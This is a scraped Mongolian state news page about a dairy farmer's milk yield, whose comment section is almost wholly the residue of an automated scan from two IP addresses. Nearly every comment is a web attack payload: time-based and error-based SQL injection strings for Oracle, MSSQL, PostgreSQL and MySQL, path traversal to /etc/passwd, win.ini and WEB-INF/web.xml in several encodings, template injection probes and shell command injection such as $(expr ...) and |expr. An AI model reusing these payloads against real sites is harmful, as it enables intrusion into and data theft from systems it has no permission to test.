Иргэн Д.Жингүү хар тарлан үүлдрийн үнээнээсээ хоногт тонн гаруй сүү гарган авч байна

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-15 14:29:28
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',7)='k 185.234.72.114 105 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t 185.234.72.114 105 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:7 185.234.72.114 105 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 105 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(7))::text>'0 185.234.72.114 105 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 105 өдөр

  123456
 • admin"and(select*from(select+sleep(7))a/**/union/**/select+1)=" 185.234.72.114 105 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 105 өдөр

  123456
 • admin'and(select*from(select+sleep(7))a/**/union/**/select+1)=' 185.234.72.114 105 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 105 өдөр

  123456
 • admin"and"h"="t 185.234.72.114 105 өдөр

  123456
 • admin"and"b"="b 185.234.72.114 105 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin'and'z'='o 185.234.72.114 105 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin'and'q'='q 185.234.72.114 105 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',7)='y
 • ../../../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
 • ../../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('i',7)
 • ../../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('t',0)
 • ../WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:7
 • ../WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • WEB-INF/web.xml;admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/
 • WEB-INF/web.xml 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/
 • ./../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
 • admin 185.234.72.114 105 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 105 өдөр

  123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='
 • admin 185.234.72.114 105 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 105 өдөр

  (select*from(select+sleep(7)union/**/select+1)a)
 • admin 185.234.72.114 105 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 105 өдөр

  123456"and"y"="q
 • admin 185.234.72.114 105 өдөр

  123456"and"f"="f
 • admin'"\( 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and'g'='z
 • admin鎈'"\( 185.234.72.114 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and't'='t
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1470005618')))>'0 185.234.72.114 105 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and+1=6
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1667817547'))) 185.234.72.114 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456/**/and+3=3
 • admin/**/and/**/cast(md5('1878750818')as/**/int)>0 185.234.72.114 105 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1188221488)as/**/int))>'0 185.234.72.114 105 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 105 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1941209098))) 185.234.72.114 105 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 105 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1710180181)))and" 185.234.72.114 105 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1039354331)))and' 185.234.72.114 105 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'"\(
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 105 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1237221981')))>'0
 • admin 185.234.72.114 105 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1367571473')))
 • admin 185.234.72.114 105 өдөр

  123456/**/and/**/cast(md5('1428658669')as/**/int)>0
 • admin 185.234.72.114 105 өдөр

  123456'and(select'1'from/**/cast(md5(1897200582)as/**/int))>'0
 • admin 185.234.72.114 105 өдөр

  extractvalue(1,concat(char(126),md5(1874362057)))
 • admin 185.234.72.114 105 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1101377742)))and"
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1375250999)))and'
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 105 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 105 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 105 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 105 өдөр

  123456
 • /etc/passwd 185.234.72.114 105 өдөр

  123456
 • <%- 959071968+919689091 %> 185.234.72.114 105 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 105 өдөр

  123456
 • expr 856675555 + 952625634 185.234.72.114 105 өдөр

  123456
 • #set($c=980076642+906820213)${c}$c 185.234.72.114 105 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin&set /A 950620754+978489162 185.234.72.114 105 өдөр

  123456
 • ${(921810711+927635300)?c} 185.234.72.114 105 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin$(expr 943126867 + 919472258) 185.234.72.114 105 өдөр

  123456
 • ${895486395+912187836} 185.234.72.114 105 өдөр

  123456
 • /*1*/{{992258296+982173196}} 185.234.72.114 105 өдөр

  123456
 • admin|expr 884448510 + 858067331 185.234.72.114 105 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 105 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin expr 952027401 + 834899138 185.234.72.114 105 өдөр

  123456
 • '-var_dump(md5(363767928))-' 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  expr 826306904 + 967165004
 • ${@var_dump(md5(538917531))}; 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  <%- 854411710+817097155 %>
 • admin 185.234.72.114 105 өдөр

  123456&set /A 826001603+973444577
 • admin 185.234.72.114 105 өдөр

  '-var_dump(md5(469339589))-'
 • ${907871080+808746878} 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456$(expr 967807228 + 938450863)
 • admin 185.234.72.114 105 өдөр

  ${@var_dump(md5(996344820))};
 • admin 185.234.72.114 105 өдөр

  #set($c=841671651+831952431)${c}$c
 • admin 185.234.72.114 105 өдөр

  123456
 • ycjozpanxkgdnrzrnfva 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  ${904262849+959656114}
 • admin 185.234.72.114 105 өдөр

  ycjozpanxkgdnrzrnfva
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456|expr 855150923 + 974894097
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  ${(949904891+996471928)?c}
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  ${906813508+867047144}
 • admin 185.234.72.114 105 өдөр

  123456 expr 983422871 + 823218632
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  /*1*/{{958251805+954330002}}
 • admin 185.234.72.114 105 өдөр

  123456
 • admin 185.234.72.114 105 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',6)='r 194.163.191.42 106 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d 194.163.191.42 106 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:6 194.163.191.42 106 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 106 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(6))::text>'0 194.163.191.42 106 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 106 өдөр

  123456
 • admin"and(select*from(select+sleep(6))a/**/union/**/select+1)=" 194.163.191.42 106 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 106 өдөр

  123456
 • admin'and(select*from(select+sleep(6))a/**/union/**/select+1)=' 194.163.191.42 106 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 106 өдөр

  123456
 • admin"and"l"="z 194.163.191.42 106 өдөр

  123456
 • admin"and"p"="p 194.163.191.42 106 өдөр

  123456
 • admin'and'o'='z 194.163.191.42 106 өдөр

  123456
 • admin'and'w'='w 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',6)='c
 • admin 194.163.191.42 106 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z
 • admin 194.163.191.42 106 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('q',6)
 • admin 194.163.191.42 106 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
 • admin 194.163.191.42 106 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:6
 • admin 194.163.191.42 106 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 106 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(6))::text>'0
 • admin 194.163.191.42 106 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and(select*from(select+sleep(6))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • ../WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 106 өдөр

  123456"and"g"="c
 • WEB-INF/web.xml 194.163.191.42 106 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 106 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456"and"d"="d
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 106 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and'i'='y
 • ../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and't'='t
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 106 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and+0=8
 • admin 194.163.191.42 106 өдөр

  123456/**/and+1=1
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 106 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 106 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 106 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 106 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • admin'"\( 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  <%- 922172715+913958117 %>
 • admin鎈'"\( 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  #set($c=896093537+868726879)${c}$c
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 106 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1750256866')))>'0 194.163.191.42 106 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  ${(828251569+971796644)?c}
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1862673738'))) 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  ${839686519+958727703}
 • admin/**/and/**/cast(md5('1254916707')as/**/int)>0 194.163.191.42 106 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 106 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1343979462)as/**/int))>'0 194.163.191.42 106 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  /*1*/{{994121465+806663326}}
 • extractvalue(1,concat(char(126),md5(1978092373))) 194.163.191.42 106 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  expr 823712336 + 841330241
 • /etc/passwdadmin 194.163.191.42 106 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1007618150)))and" 194.163.191.42 106 өдөр

  123456
 • /etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456&set /A 862882760+901736611
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 106 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1232455730)))and' 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'"\(
 • admin 194.163.191.42 106 өдөр

  123456$(expr 812746146 + 993848881)
 • admin 194.163.191.42 106 өдөр

  123456鎈'"\(
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456|expr 896136179 + 843695176
 • admin 194.163.191.42 106 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1605758387')))>'0
 • ./../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456 expr 912411203 + 976003555
 • admin 194.163.191.42 106 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1793066214')))
 • ../../../../../../etc/passwdadmin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456/**/and/**/cast(md5('1856903732')as/**/int)>0
 • admin 194.163.191.42 106 өдөр

  123456'and(select'1'from/**/cast(md5(1232090785)as/**/int))>'0
 • ../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  extractvalue(1,concat(char(126),md5(1819097107)))
 • admin 194.163.191.42 106 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1212885540)))and"
 • '-var_dump(md5(199825799))-' 194.163.191.42 106 өдөр

  123456
 • <%- 930777729+932933180 %> 194.163.191.42 106 өдөр

  123456
 • ${@var_dump(md5(505426172))}; 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1195032010)))and'
 • #set($c=818571776+931621476)${c}$c 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  '-var_dump(md5(764290628))-'
 • expr 891522278 + 950987277 194.163.191.42 106 өдөр

  123456
 • ${(895311371+829310524)?c} 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin&set /A 938880838+915802862 194.163.191.42 106 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 106 өдөр

  123456
 • ${987307468+829857455} 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  ${942046774+911328389}
 • admin$(expr 967939082 + 921268811) 194.163.191.42 106 өдөр

  123456
 • admin|expr 912249036 + 937267169 194.163.191.42 106 өдөр

  123456
 • qbxvvmetwzvqyhwoaxic 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  ${@var_dump(md5(300415564))};
 • admin 194.163.191.42 106 өдөр

  123456
 • admin expr 987740547 + 969046829 194.163.191.42 106 өдөр

  123456
 • /*1*/{{934043969+878796254}} 194.163.191.42 106 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 106 өдөр

  123456
 • ${979791035+913985721} 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  qbxvvmetwzvqyhwoaxic
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456
 • admin 194.163.191.42 106 өдөр

  123456